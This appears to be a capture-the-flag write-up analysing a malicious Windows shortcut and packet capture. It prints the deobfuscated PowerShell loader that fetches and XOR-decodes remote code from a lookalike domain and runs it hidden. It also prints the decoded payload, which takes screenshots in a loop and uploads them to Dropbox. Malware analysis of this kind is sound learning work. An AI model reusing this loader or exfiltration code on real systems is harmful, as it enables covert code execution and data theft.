Trick or Treat
Personal Rating: Medium
General
We got a .pcap file and a .lnk file with the info that the .lnk file opened a hidden command window
LNK
The lnk file performs some steps and has obfuscation to it: → Powershell is started in a hidden window → A list of user agents is defined in $UserAgents to mimic a regular browser for the requests. One is selected to $RandomUserAgent → A webclient is created and the user agent is added to the header. The content of ‘http:// windowsliveupdater.com’ is downloaded as $boddmei → From the downloaded content in $boddmei every two characters are decoded from hex to Int16 and then XORed with 0x1d → The decoded chars are concatenated to $vurnwos → The code inside $vurnwos is executed → Another var $asvods is executed as code, but it was not defined before → shell32.dll is referenced, but I dont know how or why
When I downloaded the content manually, what I see is a reference to https://unpkg.com/ tailwindcss@^2/dist/tailwind.min.css with a timeout to then open a rickroll
Opening the first link redirects to /tailwindcss@2.2.19/dist/tailwind.min.css
CURLing that shows a lot of css data, but certainly nothing that can be executed by Powershell
Since there is nothing interesting here, I suspect that I have to look at the pcap file for now.
Still, here is the code that I deobfuscated from the lnk file:
powershell.exe -windowstyle hidden:
$asvods ='';
$UserAgents = @('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','Mozilla/5.0 (Windows
NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/
15.15063','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like
Gecko');
$RandomUserAgent = $UserAgents | Get-Random;
$WebClient = New-Object System.Net.WebClient;
$WebClient.Headers.Add('User-Agent', $RandomUserAgent);
$boddmei = $WebClient.DownloadString('http://windowsliveupdater.com');
$vurnwos ='';
for($i=0;$i -le $boddmei.Length-2;$i=$i+2){
$bodms=$boddmei[$i]+$boddmei[$i+1];
$decodedChar = [char]([convert]::ToInt16($bodms, 16));
$xoredChar=[char]([byte]($decodedChar) -bxor 0x1d);
$vurnwos = $vurnwos + $xoredChar
};
Invoke-Command -ScriptBlock ([Scriptblock]::Create($vurnwos));
Invoke-Command -ScriptBlock ([Scriptblock]::Create($asvods));
C:\Windows\System32\shell32.dll%SystemRoot%\System32\shell32.dll%SystemRoot%
\System32\shell32.dll
%wN]ND.Q1SPSXFL8C&mm.S-1-5-21-3849600975-1564034632-632203374-1001
This will be important once I found the data that was actually downloaded in the incident
PCAP
There is interesting http traffic

There are some HEAD and mostly GET requests
The interesting GET requests were sent from the client 10.0.2.15 to 193.57.35.48
The host msedge.b.tlu.dl.delivery.mp.microsoft.com is queried
The data transferred seems to be ASP .NET application data
Looking at the conversations, there is a short one with the windowsliveupdater domain that we know from the link file:

Following the TCP stream, we find what is the code that we can transform with the powershell script in the .lnk file
7b68737e697472733d596f726d5f726530486d71727c793d661717465e70797178695f74737974737a353440176d7c6f7c703d35173d3d3d3d17464d7c6f7c707869786f3d35507c73797c69726f643d203d39496f6878313d4b7c7168785b6f72704d746d78717473783d203d39496f6878344017465c71747c6e353f7b3f344017466e696f74737a40394e72686f7e785b7471784d7c697517343d1739596f726d5f72655c7e7e786e6e49727678733d203d3f55495f666e2964424d68706d762c2c2c2c2c2c2c733c3c3c603f17397268696d68695b7471783d203d4e6d717469304d7c69753d394e72686f7e785b7471784d7c69753d3071787c7b1739497c6f7a78695b7471784d7c6975203f32397268696d68695b7471783f17397c6f7a3d203d3a663d3f6d7c69753f273d3f3a3d363d39497c6f7a78695b7471784d7c69753d363d3a3f313d3f707279783f273d3f7c79793f313d3f7c6869726f78737c70783f273d696f6878313d3f706869783f273d7b7c716e783d603a17397c686975726f74677c697472733d203d3f5f787c6f786f3d3f3d363d39596f726d5f72655c7e7e786e6e4972767873173975787c79786f6e3d203d53786a30527f77787e693d3f4e646e697870335e727171787e697472736e335a7873786f747e3359747e697472737c6f6446464e696f74737a4031464e696f74737a40403f173975787c79786f6e335c7979353f5c686975726f74677c697472733f313d397c686975726f74677c6974727334173975787c79786f6e335c7979353f596f726d7f7265305c4d54305c6f7a3f313d397c6f7a34173975787c79786f6e335c7979353f5e7273697873693049646d783f313d3a7c6d6d71747e7c6974727332727e697869306e696f787c703a341754736b727678304f786e695078697572793d30486f743d7569696d6e2732327e72736978736933796f726d7f72657c6d74337e7270322f327b7471786e32686d71727c793d305078697572793d4d726e693d3054735b7471783d394e72686f7e785b7471784d7c69753d3055787c79786f6e3d3975787c79786f6e176017176a75747178352c346617173d3d5c79793049646d783d305c6e6e78707f7164537c70783d4e646e697870334a747379726a6e335b726f706e314e646e69787033596f7c6a74737a17173d3d396e7e6f7878736e3d203d464a747379726a6e335b726f706e334e7e6f7878734027275c71714e7e6f7878736e17173d3d3969726d3d3d3d3d203d35396e7e6f7878736e335f726873796e3349726d3d3d3d3d613d50787c6e686f7830527f77787e693d3050747374706870343350747374706870173d3d3971787b693d3d3d203d35396e7e6f7878736e335f726873796e3351787b693d3d3d613d50787c6e686f7830527f77787e693d3050747374706870343350747374706870173d3d396a747969753d3d203d35396e7e6f7878736e335f726873796e334f747a75693d3d613d50787c6e686f7830527f77787e693d30507c65747068703433507c6574706870173d3d397578747a75693d203d35396e7e6f7878736e335f726873796e335f72696972703d613d50787c6e686f7830527f77787e693d30507c65747068703433507c657470687017173d3d397f726873796e3d3d3d203d46596f7c6a74737a334f787e697c737a71784027275b6f727051494f5f353971787b69313d3969726d313d396a74796975313d397578747a756934173d3d397f706d3d3d3d3d3d3d203d53786a30527f77787e693d3049646d78537c70783d4e646e69787033596f7c6a74737a335f7469707c6d3d305c6f7a687078736951746e693d354674736940397f726873796e336a7479697534313d354674736940397f726873796e337578747a756934173d3d397a6f7c6d75747e6e3d203d46596f7c6a74737a335a6f7c6d75747e6e4027275b6f727054707c7a7835397f706d3417173d3d397a6f7c6d75747e6e335e726d645b6f72704e7e6f78787335397f726873796e3351727e7c69747273313d46596f7c6a74737a334d7274736940272758706d6964313d397f726873796e336e7467783417173d3d397f706d334e7c6b78353f3978736b27484e584f4d4f525b545158415c6d6d597c697c4151727e7c71414978706d413978736b277e72706d6869786f737c7078305e7c6d69686f78336d737a3f34173d3d397a6f7c6d75747e6e3359746e6d726e783534173d3d397f706d3359746e6d726e783534173d3d173d3d6e697c6f69306e7178786d3d304e787e7273796e3d2c28173d3f3978736b27484e584f4d4f525b545158415c6d6d597c697c4151727e7c71414978706d413978736b277e72706d6869786f737c7078305e7c6d69686f78336d737a3f3d613d596f726d5f726530486d71727c791760
Using what I saw in the deobfuscated .lnk file, I created a decryptor with the above data in “fetchedcode”:
$dwlstring = Get-Content -Path "C:\Users\aua\Documents\htboo2023\fetchedcode" -
Raw
for($i=0;$i -le $dwlstring.Length-2;$i=$i+2){
$byte=$dwlstring[$i]+$dwlstring[$i+1];
$decodedChar = [char]([convert]::ToInt16($byte, 16));
$xoredChar=[char]([byte]($decodedChar) -bxor 0x1d);
$code = $code + $xoredChar
};
$code
This prints the resulting code, which contains the flag:
PS C:\Users\aua\Documents\htboo2023> .\decrypter.ps1
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "HTB{s4y_Pumpk1111111n!!!}"
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true,
"mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],
[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method
Post -InFile $SourceFilePath -Headers $headers
}
while(1){
Add-Type -AssemblyName System.Windows.Forms,System.Drawing
$screens = [Windows.Forms.Screen]::AllScreens
$top
= ($screens.Bounds.Top
| Measure-Object -Minimum).Minimum
$left
= ($screens.Bounds.Left
| Measure-Object -Minimum).Minimum
$width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum
$height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum
$bounds
= [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
$bmp
= New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]
$bounds.width), ([int]$bounds.height)
$graphics = [Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty,
$bounds.size)
$bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-
Capture.png")
$graphics.Dispose()
$bmp.Dispose()
start-sleep -Seconds 15
"$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-
Upload
}
Summary
The malicious .lnk file was executed on the host 10.0.2.15, which contained a powershell loader that fetches a code snippet from a site hosted at 193.57.35.48 and executes it. An older Powershell version was used to simply bypass AMSI and the shell was launched in a hidden window. The script was lightly obfuscated. The code snippet that was downloaded before just seems to upload a screenshot of the computer name of the target to dropbox. In a real incident it would usually be designed to load further malicous software from the dropbox instance, potentially to establish a C2 connection.
Last updated